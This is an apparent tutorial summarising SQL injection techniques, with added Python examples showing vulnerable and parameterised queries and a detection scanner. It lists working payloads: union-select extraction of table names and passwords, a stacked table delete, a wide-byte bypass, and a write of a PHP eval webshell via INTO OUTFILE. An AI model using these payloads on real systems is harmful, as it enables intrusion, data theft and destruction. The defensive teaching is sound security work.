Summary of SQL injection (I)
2022-06-25 04:53:00 【Key_ Words】
Part one: Conventional injection (the data is echoed to the front end)
Step one: Test the data type
1. Numeric
id=1 and 1=1 page renders normally
id=1 and 1=2 page breaks
2. Character
id=1' and '1'='1 page renders normally
id=1' and '1'='2 page breaks
3. Sleep-based judgment (used when the data is not echoed to the front end)
id=1' and sleep(10)--+ the page stalling for 10 seconds indicates the judgment is correct
4. Common ways developers wrap the received parameter
Numeric: id=$id
Character: id='$id'
Parentheses + single quotes: id=('$id')
Parentheses + double quotes: id=("$id")
Double parentheses + single quotes: id=(('$id'))
5. Note: when injecting, the comment sequences --+ and # can be used interchangeably
Step two: Start injecting
The following uses MySQL with an integer-typed parameter as the demonstration case.
1. Guess the number of columns (find the value at which the page switches from normal to error)
?id=1 order by 4
2. Prepare the union query (see which columns are echoed)
?id=-1 union select 1,2,3,4
3. Information gathering
Database version: version()
Database name: database()
Database user: user()
Operating system: @@version_compile_os
Database path: @@datadir or @@basedir
4. Get the table names (using the database name obtained in the previous step)
Query the table names under the database named dvwa: ?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='dvwa'
5. Get the column names (using the table name obtained in the previous step)
Query the column names under the table named GJC: ?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='GJC'
6. Get the data
Query the data in the named table: ?id=1 union select 1,name,password,4 from GJC
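To make concrete what the probes in steps one and two are testing, here is an added Python example (not from the original article; it uses SQLite in memory rather than MySQL, and its tables and rows are constructed for the demonstration). fetch_product_concat is the numeric pattern id=$id with the parameter pasted into the query text; fetch_product_typed and fetch_user_typed are the hardened numeric and character forms, and echoes_differ runs the step-one heuristic against either of them.

```python
import sqlite3

# Constructed schema standing in for the article's target tables (not from the original).
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO products VALUES (1, 'widget', 9.5), (2, 'gadget', 12.0);
INSERT INTO users VALUES (1, 'admin', 'not-a-real-hash');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_product_concat(conn, raw_id: str):
    """Vulnerable: the article's numeric pattern id=$id, parameter pasted into the SQL text."""
    sql = f"SELECT id, name, price FROM products WHERE id={raw_id}"
    return conn.execute(sql).fetchall()


def fetch_product_typed(conn, raw_id: str):
    """Hardened numeric pattern: coerce to int first (rejecting anything else), then bind."""
    try:
        product_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id=?", (product_id,)
    ).fetchall()


def fetch_user_typed(conn, raw_name: str):
    """Hardened character pattern id='$id': the driver binds the whole string as one value."""
    return conn.execute("SELECT id, name FROM users WHERE name=?", (raw_name,)).fetchall()


def echoes_differ(fetch, conn, true_probe: str, false_probe: str) -> bool:
    """The article's step-one heuristic: do the 'and 1=1' and 'and 1=2' variants respond differently?"""
    return fetch(conn, true_probe) != fetch(conn, false_probe)


if __name__ == "__main__":
    db = make_db()
    for fn in (fetch_product_concat, fetch_product_typed):
        print(fn.__name__, "responses differ:", echoes_differ(fn, db, "1 and 1=1", "1 and 1=2"))
    print("character probe, bound:", fetch_user_typed(db, "admin' and '1'='1"))
```

Against the concatenating function the 1=1 / 1=2 pair produces different results, which is exactly the signal step one looks for; against the typed and bound versions both probes return nothing, and the string-context probe is looked up as a literal user name. The same principle applies to MySQL with mysqli or PDO prepared statements; the int() coercion additionally rejects the order by and union select payloads of step two before any SQL is built.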
Part two: Blind injection (the data is not echoed to the front end)
1. Error-based SQL injection
2. Boolean-based SQL injection (note the use of binary search)
We construct a condition such as (length(database()) = 8) and observe whether the target satisfies it: if it does, the query executes successfully; if not, it fails. database() is the current database name, length(database()) takes the length of that name, and the comparison operators <, =, > (less than, equal to, greater than) are used to test the condition and narrow down the guess.
3. Time-based SQL injection
Part three: Writing files through injection
Precondition: the absolute path of the website must be known first. (Ways it is obtained: error messages, Google syntax with site: the target site, leftover files such as phpinfo, paths disclosed by vulnerabilities, reading configuration files)
1. First determine whether the parameter is handled as numeric or character
2. Start writing the file (although the page reports an error, the write has succeeded)
?id=1')) union select 1,2,3 into outfile "D:\\phpStudy\\ Other paths \\" --+
We can write the one-line PHP payload directly into the file
?id=1')) union select 1,2,'<?php @eval($_post["mima"])?>' into outfile "D:\\phpStudy\\ Other paths \\yijuhua.php" --+
Part four: Injection through other submission points
1. SQL injection in login and registration forms
Determine whether the username or the password field is the better injection point
2. User-Agent injection
Capture the HTTP headers and modify the value of user-agent to carry the SQL injection.
3. Referer injection
Capture the HTTP headers and modify the value of referer to carry the SQL injection.
4. Cookie injection
Capture the HTTP headers and modify the value of the cookie to carry the SQL injection.
(After the first login, save the cookie and log out; at the next login, modify the cookie value to carry out the injection)
Part five: Injection extensions
1. Second-order injection
The principle of second-order injection: when data is first inserted into the database, addslashes (or get_magic_quotes_gpc) escapes the special characters. A property of addslashes is that although the parameter is given an escaping "\" after filtering, the "\" itself is not inserted into the database: the original data is written to the database unchanged.
Once the data is stored in the database, developers consider it trustworthy. The next time it is needed, the dirty data is pulled straight out of the database and used without further checking or handling, which causes a second SQL injection. For example, data containing a single quote is inserted into the database on the first request; when that data is later read back and used in another statement, a second-order injection is formed.
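An added example (not the article's code) that reproduces the two-step sequence described above with SQLite in memory: register escapes quotes at insert time, standing in for addslashes (SQLite doubles the quote where MySQL would backslash it), so the stored value is the original string; change_password_unsafe later trusts that stored value and concatenates it, while change_password_safe binds it. The table and the usernames are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed table: one pre-existing privileged account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'original-admin-secret')")
    return conn


def escape_for_insert(value: str) -> str:
    """Escaping at the first insert, standing in for addslashes(): the quote is neutralised
    inside this one statement, but the value stored in the table is the original string."""
    return value.replace("'", "''")


def register(conn, username: str, password: str) -> None:
    # First use of the data: escaped, so this INSERT itself is not injectable.
    conn.execute(
        f"INSERT INTO users VALUES ('{escape_for_insert(username)}', "
        f"'{escape_for_insert(password)}')"
    )


def stored_username(conn, username: str) -> str:
    """What comes back out of the table: the unescaped original."""
    return conn.execute("SELECT username FROM users WHERE username=?", (username,)).fetchone()[0]


def change_password_unsafe(conn, session_user: str, new_pw: str) -> None:
    # Second use: the value read back from the database is treated as trusted and concatenated.
    conn.execute(f"UPDATE users SET password='{new_pw}' WHERE username='{session_user}'")


def change_password_safe(conn, session_user: str, new_pw: str) -> None:
    # Every statement binds its parameters, whatever the provenance of the value.
    conn.execute("UPDATE users SET password=? WHERE username=?", (new_pw, session_user))


def admin_password(conn) -> str:
    return conn.execute("SELECT password FROM users WHERE username='admin'").fetchone()[0]


if __name__ == "__main__":
    crafted = "admin'-- "          # constructed username containing a single quote
    for change in (change_password_unsafe, change_password_safe):
        db = make_db()
        register(db, crafted, "x")
        change(db, stored_username(db, crafted), "pwned")
        print(change.__name__, "-> admin password is now:", admin_password(db))
```

The escape applied at registration protects only the INSERT; the stored username comes back bare, and the UPDATE built from it no longer refers to the row the session belongs to. Binding the parameters in every statement, not only the first, is the fix; re-escaping the value before each reuse also works but is easy to forget.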

2. Encryption and decryption injection
Principle: the GET or POST parameter is encoded with base64 or a similar scheme before being passed to the server, e.g. www.xxx.com/index.php?id=MQ==
Encoded part: MQ==
Decoded result: 1, equivalent to id=1
To write an injection statement, construct the statement first and then base64-encode it:
id=1 and 1=1
base64 encoding result: MSBhbmQgMT0x
The request becomes: www.xxx.com/index.php?id=MSBhbmQgMT0x
3. DNSlog out-of-band injection (proxy pool)
Why use dnslog injection: in general, when data cannot be obtained directly through a union query, we are left with blind injection and have to extract the data step by step. Testing blind injection by hand takes time; you may think of running sqlmap directly to pull the data, but in real tests running a blind injection with sqlmap has a good chance of getting your IP banned by the site, which holds up the test, so a proxy pool may be used.
4. Stacked injection
Limitation: only some databases support it
Principle: on the MySQL command line every statement ends with ";". This raises the question of whether several statements can be used together. (Benefit: no need to worry about encryption)
Example: select * from products where productid=1;delete from products
When the query runs, the first statement shows the query result and the second deletes the entire table.
5. Wide-byte injection
When PHP connects to MySQL with "set character_set_client = gbk", a character-set conversion problem arises: the familiar wide-byte injection. When it is present, passing %df%27 in the injection parameter lets the %df byte swallow the escaping backslash (%5c), for example: id=1%df' and 1=1%23
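The mechanism is easier to see at the byte level. The following added Python example (not from the original article) imitates addslashes() on the parameter %df%27 and decodes the result as GBK and as UTF-8; addslashes_bytes, escaped_literal and quote_survives_escaping are constructed helpers, and no database connection is involved.

```python
from urllib.parse import unquote_to_bytes


def addslashes_bytes(data: bytes) -> bytes:
    """Byte-level imitation of PHP addslashes(): a backslash before ' " \\ and NUL (constructed helper)."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # the escaping backslash, %5c
        out.append(b)
    return bytes(out)


def escaped_literal(raw_param: str, charset: str) -> str:
    """URL-decode the parameter, escape it, then decode the bytes as the client charset would."""
    raw = unquote_to_bytes(raw_param)  # "%df%27" -> b"\xdf'"
    escaped = addslashes_bytes(raw)    # 0xdf 0x5c 0x27
    return escaped.decode(charset, errors="replace")


def quote_survives_escaping(raw_param: str, charset: str) -> bool:
    """True if a single quote reaches the SQL text without a backslash directly in front of it."""
    text = escaped_literal(raw_param, charset)
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\") for i, ch in enumerate(text))


if __name__ == "__main__":
    for cs in ("gbk", "utf-8"):
        print(cs, repr(escaped_literal("%df%27", cs)),
              "bare quote reaches SQL:", quote_survives_escaping("%df%27", cs))
```

Under GBK the bytes 0xDF and 0x5C form one two-byte character and the quote is left bare; under UTF-8 the backslash stays in front of the quote. The practical fix is to set the connection charset through the driver (mysqli_set_charset() or the charset parameter of the PDO DSN) rather than with SET NAMES, so that the client-side escaping routine and the server agree on the encoding, and to bind parameters instead of concatenating.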
6. Others ...
Note: the above does not consider the case where the target is protected by a WAF!!!
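A defender-side complement to the list above (an added example, not from the original article): a small scanner that turns the techniques named in this summary into detection signatures and applies them to query parameters and to the User-Agent, Referer and Cookie headers from part four, after URL-decoding and after attempting the base64 decoding from the encryption section. The signature names, header handling (lower-case header names assumed) and sample requests are constructed for the example.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Detection signatures for the techniques listed in this article (constructed for the example).
SIGNATURES = [
    ("boolean", re.compile(r"\b(and|or)\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+", re.I)),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("schema", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("time", re.compile(r"\bsleep\s*\(", re.I)),
    ("file_write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("stacked", re.compile(r";\s*(delete|drop|update|insert)\b", re.I)),
]

BASE64_SHAPE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def maybe_base64(value: str) -> Optional[str]:
    """Return the decoded text if the value looks like base64 of printable ASCII, else None."""
    if len(value) % 4 or not BASE64_SHAPE.fullmatch(value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def candidate_values(url: str, headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Collect (location, decoded value) pairs from the query string and the headers of part four."""
    values = []
    for key, val in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        values.append((f"query:{key}", val))
        decoded = maybe_base64(val)
        if decoded is not None:
            values.append((f"query:{key}:base64", decoded))
    for name in ("user-agent", "referer", "cookie"):
        if name in headers:
            values.append((f"header:{name}", unquote_plus(headers[name])))
    return values


def scan_request(url: str, headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (location, signature) pairs for every signature that fires on one request."""
    hits = []
    for location, value in candidate_values(url, headers):
        for name, pattern in SIGNATURES:
            if pattern.search(value):
                hits.append((location, name))
    return hits


if __name__ == "__main__":
    # Constructed sample requests modelled on the payload shapes in the article.
    samples = [
        ("/index.php?id=1", {}),
        ("/index.php?id=MSBhbmQgMT0x", {}),
        ("/index.php?id=-1 union select 1,group_concat(table_name),3,4 "
         "from information_schema.tables where table_schema='dvwa'", {}),
        ("/index.php?id=1", {"user-agent": "Mozilla/5.0' and sleep(10)--+"}),
    ]
    for sample_url, sample_headers in samples:
        print(sample_url, sample_headers, "->", scan_request(sample_url, sample_headers) or "clean")
```

Signature matching of this kind is what a WAF does, which is why the note above matters: it catches the textbook shapes shown in this summary, not every variant. The base64 pass is what distinguishes id=MSBhbmQgMT0x from an opaque identifier; the file_write signature corresponds to the INTO OUTFILE technique of part three, for which the server-side control is MySQL's secure_file_priv variable (restricting the directory, or disabling the capability entirely when set to NULL) independent of what reaches the query.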